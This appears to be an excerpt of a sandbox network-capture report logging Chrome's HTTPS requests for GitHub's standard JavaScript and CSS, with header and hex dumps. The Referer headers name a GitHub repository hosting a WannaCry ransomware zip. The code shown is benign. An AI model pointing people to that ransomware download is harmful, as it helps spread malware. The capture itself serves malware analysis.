                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 20 20 20 20 77 69 64 74 68 3a 20 2d 6d 6f 7a 2d 66 69 74 2d 63 6f 6e 74 65 6e 74 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 2d 6d 6f 7a 2d 66 69 74 2d 63 6f 6e 74 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 69 6e 73 65 74 3a 20 30 29 20 7b 0a 20 20 20 20 3a 77 68 65 72 65 28 5b 70 6f 70 6f 76 65 72 5d 29 20 7b 0a 20 20 20 20 20 20 74 6f 70 3a 20 30 3b 0a 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0a 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 3a 77 68 65 72 65 28 5b 70 6f 70 6f 76 65 72 5d 3a 6e 6f 74 28 2e 5c 5c 3a 70 6f 70 6f 76 65 72 2d 6f 70 65 6e 29 29 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20
                                                                                      Data Ascii: width: -moz-fit-content; height: -moz-fit-content; } } @supports not (inset: 0) { :where([popover]) { top: 0; left: 0; right: 0; bottom: 0; } } :where([popover]:not(.\\:popover-open)) { display:
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 62 75 74 65 28 22 70 6f 70 6f 76 65 72 22 2c 65 29 7d 7d 2c 73 68 6f 77 50 6f 70 6f 76 65 72 3a 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 28 29 7b 67 28 74 68 69 73 29 7d 7d 2c 68 69 64 65 50 6f 70 6f 76 65 72 3a 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 28 29 7b 76 28 74 68 69 73 2c 21 30 2c 21 30 29 7d 7d 2c 74 6f 67 67 6c 65 50 6f 70 6f 76 65 72 3a 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 28 65 29 7b 22 73 68 6f 77 69 6e 67 22 3d 3d 3d 61 2e 67 65 74 28 74 68 69 73 29 26 26 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 21 31 3d 3d 3d 65 3f 76 28 74 68 69 73 2c 21 30
                                                                                      Data Ascii: bute("popover",e)}},showPopover:{enumerable:!0,configurable:!0,value(){g(this)}},hidePopover:{enumerable:!0,configurable:!0,value(){v(this,!0,!0)}},togglePopover:{enumerable:!0,configurable:!0,value(e){"showing"===a.get(this)&&void 0===e||!1===e?v(this,!0
                                                                                      2024-03-23 14:47:22 UTC1229INData Raw: 67 65 74 41 74 74 72 69 62 75 74 65 28 22 70 6f 70 6f 76 65 72 74 61 72 67 65 74 22 29 3b 72 65 74 75 72 6e 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 6f 63 75 6d 65 6e 74 7c 7c 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 4d 29 26 26 6f 26 26 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6f 29 7c 7c 6e 75 6c 6c 7d 7d 2c 70 6f 70 6f 76 65 72 54 61 72 67 65 74 41 63 74 69 6f 6e 3a 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 28 29 7b 6c 65 74 20 65 3d 28 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 70 6f 70 6f 76 65 72 74 61 72 67 65 74 61 63 74 69 6f 6e 22 29 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 73 68 6f 77 22 3d 3d 3d 65 7c 7c 22 68 69 64 65
                                                                                      Data Ascii: getAttribute("popovertarget");return(t instanceof Document||t instanceof M)&&o&&t.getElementById(o)||null}},popoverTargetAction:{enumerable:!0,configurable:!0,get(){let e=(this.getAttribute("popovertargetaction")||"").toLowerCase();return"show"===e||"hide


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.1649718185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:22 UTC666OUTGET /assets/ui_packages_failbot_failbot_ts-5bd9ba639cc0.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:22 UTC685INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 8835
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Mon, 11 Mar 2024 10:47:38 GMT
                                                                                      ETag: 0x8DC41B8ABA176B7
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:22 GMT
                                                                                      Age: 795660
                                                                                      X-Served-By: cache-iad-kiad7000121-IAD, cache-ewr18131-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 60, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 82e7c9a2fc9caae0111558510210243c9d59497b
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 66 61 69 6c 62 6f 74 5f 66 61 69 6c 62 6f 74 5f 74 73 22 5d 2c 7b 34 30 35 37 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6c 65 74 20 72 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 69 66 28 21 72 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 6c 69 65 6e 74 20 65 6e 76 20 77 61 73 20 72 65 71 75 65 73 74 65 64 20 62 65 66 6f 72 65 20 69 74 20 77 61 73 20 6c 6f 61 64 65 64 2e 20 54 68 69 73 20 6c 69 6b 65 6c 79 20 6d 65 61 6e 73 20 79 6f 75 20 61 72 65 20 61 74 74 65 6d 70 74 69 6e 67 20 74 6f 20 75 73 65 20 63
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_failbot_failbot_ts"],{40578:(e,t,n)=>{let r;function o(){if(!r)throw Error("Client env was requested before it was loaded. This likely means you are attempting to use c
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 2e 68 61 73 28 65 2e 6d 65 73 73 61 67 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 65 2c 74 3d 7b 7d 29 7b 69 66 28 28 30 2c 6c 2e 63 29 28 22 46 41 49 4c 42 4f 54 5f 48 41 4e 44 4c 45 5f 4e 4f 4e 5f 45 52 52 4f 52 53 22 29 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 6e 75 6c 6c 21 3d 3d 65 26 26 22 6e 61 6d 65 22 69 6e 20 65 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6e 61 6d 65 26 26 22 6d 65 73 73 61 67 65 22 69 6e 20 65 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6d 65 73 73 61 67 65 29 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 7c 7c 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 65 7c
                                                                                      Data Ascii: .has(e.message))}function y(e,t={}){if((0,l.c)("FAILBOT_HANDLE_NON_ERRORS")){if(!(e instanceof Error||"object"==typeof e&&null!==e&&"name"in e&&"string"==typeof e.name&&"message"in e&&"string"==typeof e.message)){if(function(e){if(!e||"boolean"==typeof e|
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 28 29 7b 6c 65 74 20 65 3d 69 28 22 6d 65 74 61 5b 6e 61 6d 65 3d 61 6e 61 6c 79 74 69 63 73 2d 6c 6f 63 61 74 69 6f 6e 2d 71 75 65 72 79 2d 73 74 72 69 70 5d 22 29 2c 74 3d 22 22 3b 65 7c 7c 28 74 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 6c 65 74 20 6e 3d 69 28 22 6d 65 74 61 5b 6e 61 6d 65 3d 61 6e 61 6c 79 74 69 63 73 2d 6c 6f 63 61 74 69 6f 6e 2d 70 61 72 61 6d 73 5d 22 29 3b 66 6f 72 28 6c 65 74 20 65 20 6f 66 28 6e 26 26 28 74 2b 3d 28 74 3f 22 26 22 3a 22 3f 22 29 2b 6e 2e 63 6f 6e 74 65 6e 74 29 2c 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 6d 65 74 61 5b 6e 61 6d 65 3d 61 6e 61 6c 79 74 69 63 73 2d 70 61 72 61 6d 2d 72 65 6e 61 6d 65 5d 22 29 29 29 7b 6c 65 74 20 6e 3d 65 2e
                                                                                      Data Ascii: (){let e=i("meta[name=analytics-location-query-strip]"),t="";e||(t=window.location.search);let n=i("meta[name=analytics-location-params]");for(let e of(n&&(t+=(t?"&":"?")+n.content),document.querySelectorAll("meta[name=analytics-param-rename]"))){let n=e.
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 61 70 28 65 3d 3e 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 53 65 74 28 74 29 7d 6c 65 74 20 63 3d 61 2e 57 36 3f 69 3a 28 30 2c 72 2e 5a 29 28 69 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 63 28 29 2e 68 61 73 28 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 7d 6c 65 74 20 6c 3d 7b 69 73 46 65 61 74 75 72 65 45 6e 61 62 6c 65 64 3a 75 7d 7d 2c 35 34 35 30 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 41 37 3a 28 29 3d 3e 75 2c 6b 6f 3a 28 29 3d 3e 63 2c 71 31 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 72 3d 6e 28 31 35 32 30 35 29 2c 6f 3d 6e 28 37 31 32 30 37 29 3b 6c 65 74 20 61 3d 28 30 2c 72 2e 5a 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 6e 34 3f 2e
                                                                                      Data Ascii: ap(e=>e.toUpperCase());return new Set(t)}let c=a.W6?i:(0,r.Z)(i);function u(e){return c().has(e.toUpperCase())}let l={isFeatureEnabled:u}},54508:(e,t,n)=>{n.d(t,{A7:()=>u,ko:()=>c,q1:()=>i});var r=n(15205),o=n(71207);let a=(0,r.Z)(function(){return o.n4?.
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 74 6f 53 74 72 69 6e 67 28 29 29 7d 7d 63 61 74 63 68 28 65 29 7b 69 66 28 6c 26 26 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 26 26 65 2e 6d 65 73 73 61 67 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 63 6c 75 64 65 73 28 22 71 75 6f 74 61 22 29 29 74 68 72 6f 77 20 65 7d 7d 2c 72 65 6d 6f 76 65 49 74 65 6d 3a 66 2c 63 6c 65 61 72 3a 75 2e 63 6c 65 61 72 2c 6b 65 79 3a 75 2e 6b 65 79 2c 67 65 74 20 6c 65 6e 67 74 68 28 29 7b 72 65 74 75 72 6e 20 75 2e 6c 65 6e 67 74 68 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 72 65 74 75 72 6e 20 69 28 65 2c 7b 74 68 72 6f 77 51 75 6f 74 61 45 72 72 6f 72 73 4f 6e 53 65 74 3a 21 31 7d 2c 77 69 6e 64 6f 77 2c 4a 53 4f 4e 2e 70 61 72 73 65 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 29 7d 7d
                                                                                      Data Ascii: toString())}}catch(e){if(l&&e instanceof Error&&e.message.toLowerCase().includes("quota"))throw e}},removeItem:f,clear:u.clear,key:u.key,get length(){return u.length}}}function c(e){return i(e,{throwQuotaErrorsOnSet:!1},window,JSON.parse,JSON.stringify)}}
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 6e 61 6d 65 22 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 28 30 2c 72 2e 4c 53 29 28 73 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 49 28 29 7b 72 65 74 75 72 6e 28 30 2c 72 2e 72 56 29 28 73 29 7d 7d 2c 37 31 32 30 37 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 51 67 3a 28 29 3d 3e 72 2e 51 67 2c 57 36 3a 28 29 3d 3e 72 2e 57 36 2c 63 46 3a 28 29 3d 3e 72 2e 63 46 2c 69 47 3a 28 29 3d 3e 6f 2e 69 47 2c 6e 34 3a 28 29 3d 3e 6f 2e 6e 34 2c 73 73 72 53 61 66 65 4c 6f 63 61 74 69 6f 6e 3a 28 29 3d 3e 6f 2e 6a 58 2c 7a 75 3a 28 29 3d 3e 6f 2e 7a 75 7d 29 3b 76 61 72 20 72 3d 6e 28 36 30 33 32 37 29 2c 6f 3d 6e 28 36 36 31 39 39 29 7d 2c 36 36 31 39 39 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 69 47 3a 28 29 3d 3e 6f 2c 6a 58 3a 28 29 3d
                                                                                      Data Ascii: name")}function k(e){(0,r.LS)(s,e)}function I(){return(0,r.rV)(s)}},71207:(e,t,n)=>{n.d(t,{Qg:()=>r.Qg,W6:()=>r.W6,cF:()=>r.cF,iG:()=>o.iG,n4:()=>o.n4,ssrSafeLocation:()=>o.jX,zu:()=>o.zu});var r=n(60327),o=n(66199)},66199:(e,t,n)=>{n.d(t,{iG:()=>o,jX:()=
                                                                                      2024-03-23 14:47:22 UTC567INData Raw: 28 3b 6e 2e 6c 65 6e 67 74 68 3e 30 3b 29 74 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 65 2e 73 68 69 66 74 28 29 2c 6e 3d 5b 74 5d 2c 72 3d 74 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 3b 65 2e 6c 65 6e 67 74 68 3e 30 26 26 72 3c 3d 36 35 35 33 36 3b 29 7b 6c 65 74 20 74 3d 65 5b 30 5d 2e 6c 65 6e 67 74 68 3b 69 66 28 72 2b 74 3c 3d 36 35 35 33 36 29 7b 6c 65 74 20 6f 3d 65 2e 73 68 69 66 74 28 29 3b 6e 2e 70 75 73 68 28 6f 29 2c 72 2b 3d 74 7d 65 6c 73 65 20 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 6e 7d 28 6e 29 29 3b 72 65 74 75 72 6e 20 74 7d 28 63 29 3b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 74 29 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 72 79 7b 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 26 26 6e 61 76
                                                                                      Data Ascii: (;n.length>0;)t.push(function(e){let t=e.shift(),n=[t],r=t.length;for(;e.length>0&&r<=65536;){let t=e[0].length;if(r+t<=65536){let o=e.shift();n.push(o),r+=t}else break}return n}(n));return t}(c);for(let n of t)!function(e,t){try{navigator.sendBeacon&&nav


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.1649719185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:22 UTC647OUTGET /assets/environment-27057bd9ed0b.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:22 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 10925
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 07 Mar 2024 20:21:20 GMT
                                                                                      ETag: 0x8DC3EE4271E2392
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:22 GMT
                                                                                      Age: 1353040
                                                                                      X-Served-By: cache-iad-kjyo7100129-IAD, cache-lga21980-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 58, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 4b34fe86a3ee50ffb562973b0ab2755c2fefd355
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 5d 2c 7b 33 30 35 32 33 3a 65 3d 3e 7b 65 2e 65 78 70 6f 72 74 73 3d 7b 70 6f 6c 79 66 69 6c 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 77 69 6e 64 6f 77 2c 6f 3d 64 6f 63 75 6d 65 6e 74 3b 69 66 28 21 28 22 73 63 72 6f 6c 6c 42 65 68 61 76 69 6f 72 22 69 6e 20 6f 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 74 79 6c 65 29 7c 7c 21 30 3d 3d 3d 74 2e 5f 5f 66 6f 72 63 65 53 6d 6f 6f 74 68 53 63 72 6f 6c 6c 50 6f 6c 79 66 69 6c 6c 5f 5f 29 7b 76 61 72 20 72 3d 74 2e 48 54 4d 4c 45 6c 65 6d 65 6e 74 7c 7c 74 2e
                                                                                      Data Ascii: (globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["environment"],{30523:e=>{e.exports={polyfill:function(){var e,t=window,o=document;if(!("scrollBehavior"in o.documentElement.style)||!0===t.__forceSmoothScrollPolyfill__){var r=t.HTMLElement||t.
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 73 63 72 6f 6c 6c 59 7c 7c 74 2e 70 61 67 65 59 4f 66 66 73 65 74 29 29 7d 7d 2c 72 2e 70 72 6f 74 6f 74 79 70 65 2e 73 63 72 6f 6c 6c 3d 72 2e 70 72 6f 74 6f 74 79 70 65 2e 73 63 72 6f 6c 6c 54 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 7b 69 66 28 21 30 3d 3d 3d 73 28 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 29 7b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 61 72 67 75 6d 65 6e 74 73 5b 30 5d 26 26 76 6f 69 64 20 30 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 29 74 68 72 6f 77 20 53 79 6e 74 61 78 45 72 72 6f 72 28 22 56 61 6c 75 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 63 6f 6e 76 65 72 74 65 64 22 29 3b 6e 2e 65 6c 65 6d 65 6e 74 53 63 72 6f 6c 6c 2e 63 61 6c 6c
                                                                                      Data Ascii: scrollY||t.pageYOffset))}},r.prototype.scroll=r.prototype.scrollTo=function(){if(void 0!==arguments[0]){if(!0===s(arguments[0])){if("number"==typeof arguments[0]&&void 0===arguments[1])throw SyntaxError("Value could not be converted");n.elementScroll.call
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 74 68 69 73 2c 65 2c 65 2e 73 63 72 6f 6c 6c 4c 65 66 74 2b 6c 2e 6c 65 66 74 2d 72 2e 6c 65 66 74 2c 65 2e 73 63 72 6f 6c 6c 54 6f 70 2b 6c 2e 74 6f 70 2d 72 2e 74 6f 70 29 2c 22 66 69 78 65 64 22 21 3d 3d 74 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 29 2e 70 6f 73 69 74 69 6f 6e 26 26 74 2e 73 63 72 6f 6c 6c 42 79 28 7b 6c 65 66 74 3a 72 2e 6c 65 66 74 2c 74 6f 70 3a 72 2e 74 6f 70 2c 62 65 68 61 76 69 6f 72 3a 22 73 6d 6f 6f 74 68 22 7d 29 29 3a 74 2e 73 63 72 6f 6c 6c 42 79 28 7b 6c 65 66 74 3a 6c 2e 6c 65 66 74 2c 74 6f 70 3a 6c 2e 74 6f 70 2c 62 65 68 61 76 69 6f 72 3a 22 73 6d 6f 6f 74 68 22 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 74 68 69 73 2e 73 63 72 6f 6c 6c 4c 65 66 74 3d 65 2c 74 68 69 73 2e 73 63 72 6f 6c
                                                                                      Data Ascii: this,e,e.scrollLeft+l.left-r.left,e.scrollTop+l.top-r.top),"fixed"!==t.getComputedStyle(e).position&&t.scrollBy({left:r.left,top:r.top,behavior:"smooth"})):t.scrollBy({left:l.left,top:l.top,behavior:"smooth"})}}function c(e,t){this.scrollLeft=e,this.scrol
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 63 20 65 3d 3e 7b 69 66 28 65 2e 70 72 6f 6d 69 73 65 29 74 72 79 7b 61 77 61 69 74 20 65 2e 70 72 6f 6d 69 73 65 7d 63 61 74 63 68 28 65 29 7b 72 2e 65 4b 28 65 29 7d 7d 29 2c 6e 2e 69 47 3f 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3d 3d 3d 22 23 62 30 30 6d 22 26 26 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 30 30 6d 22 29 7d 29 2c 6f 28 33 30 35 32 33 29 2c 6f 28 31 33 36 30 34 29 3b 76 61 72 20 6c 3d 6f 28 34 37 39 34 30 29 2c 69 3d 6f 28 35 30 36 35 35 29 3b 6c 65 74 20 63 3d 22 64 65 66 61 75 6c 74 22 3b 6c 2e 5a 4f 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 63 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 65 3d 3e 69 2e 4f 2e 61 70 70 6c 79 28 7b 70 6f 6c 69 63 79 3a 28 29 3d 3e 65 2c 70 6f 6c 69 63 79 4e 61
                                                                                      Data Ascii: c e=>{if(e.promise)try{await e.promise}catch(e){r.eK(e)}}),n.iG?.location.hash==="#b00m"&&setTimeout(()=>{throw Error("b00m")}),o(30523),o(13604);var l=o(47940),i=o(50655);let c="default";l.ZO.createPolicy(c,{createHTML:e=>i.O.apply({policy:()=>e,policyNa
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 72 79 53 65 6c 65 63 74 6f 72 28 22 6d 65 74 61 5b 6e 61 6d 65 3d 76 69 73 69 74 6f 72 2d 70 61 79 6c 6f 61 64 5d 22 29 3b 69 66 28 6f 29 7b 6c 65 74 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 61 74 6f 62 28 6f 2e 63 6f 6e 74 65 6e 74 29 29 3b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2c 65 29 7d 6c 65 74 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 66 6f 72 28 6c 65 74 5b 65 2c 6f 5d 6f 66 20 72 29 64 2e 69 6e 63 6c 75 64 65 73 28 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 26 26 28 74 5b 65 5d 3d 6f 29 3b 72 65 74 75 72 6e 20 74 2e 73 74 61 66 66 3d 28 30 2c 63 2e 42 29 28 29 2e 74 6f 53 74 72 69 6e 67 28 29 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28
                                                                                      Data Ascii: rySelector("meta[name=visitor-payload]");if(o){let e=JSON.parse(atob(o.content));Object.assign(t,e)}let r=new URLSearchParams(window.location.search);for(let[e,o]of r)d.includes(e.toLowerCase())&&(t[e]=o);return t.staff=(0,c.B)().toString(),Object.assign(
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 63 79 2e 73 61 6e 69 74 69 7a 65 22 2c 7b 70 6f 6c 69 63 79 4e 61 6d 65 3a 74 2c 6f 75 74 70 75 74 3a 61 2c 73 74 61 63 6b 3a 63 2c 6f 75 74 70 75 74 4c 65 6e 67 74 68 3a 6c 2e 6c 65 6e 67 74 68 2c 73 61 6e 69 74 69 7a 65 64 4c 65 6e 67 74 68 3a 72 2e 6c 65 6e 67 74 68 2c 65 78 65 63 75 74 69 6f 6e 54 69 6d 65 3a 6e 2d 6f 7d 29 2c 65 28 6c 29 7d 7d 29 2c 6c 7d 63 61 74 63 68 28 65 29 7b 69 66 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 54 72 75 73 74 65 64 54 79 70 65 73 50 6f 6c 69 63 79 45 72 72 6f 72 7c 7c 28 64 7c 7c 28 30 2c 6c 2e 65 4b 29 28 65 29 2c 28 30 2c 6e 2e 62 29 28 7b 69 6e 63 72 65 6d 65 6e 74 4b 65 79 3a 22 54 52 55 53 54 45 44 5f 54 59 50 45 53 5f 50 4f 4c 49 43 59 5f 45 52 52 4f 52 22 2c 74 72 75 73 74 65 64 54 79 70 65 73 50 6f 6c 69 63
                                                                                      Data Ascii: cy.sanitize",{policyName:t,output:a,stack:c,outputLength:l.length,sanitizedLength:r.length,executionTime:n-o}),e(l)}}),l}catch(e){if(e instanceof TrustedTypesPolicyError||(d||(0,l.eK)(e),(0,n.b)({incrementKey:"TRUSTED_TYPES_POLICY_ERROR",trustedTypesPolic
